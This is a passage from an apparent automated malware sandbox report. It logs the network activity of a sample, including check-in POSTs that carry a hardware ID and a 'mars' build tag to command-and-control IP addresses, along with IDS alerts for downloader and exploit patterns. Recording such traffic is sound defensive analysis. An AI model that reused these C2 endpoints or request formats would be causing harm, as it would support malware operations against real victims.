name="hwid"F72ADCB3FF603810289448------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="build"mars------GIJDAFBKFIECBGCAKECG--
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build"mars------FCFBFHIEBKJKFHIEBFBA--
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build"mars------BAKFCBFHJDHJKECAKEHI--
                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49753 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49762 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49851 -> 87.120.125.254:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49893 -> 31.41.244.11:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49929 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49971 -> 23.192.247.89:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49970 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49982 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49988 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50003 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50015 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50028 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50043 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 23.192.247.89:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50059 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50061 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50066 -> 23.192.247.89:443
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49763
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49756
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6ECC60 PR_Recv,0_2_6C6ECC60
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xw22vO9TWLLn8Hf&MD=UgM+Sxz6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xw22vO9TWLLn8Hf&MD=UgM+Sxz6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
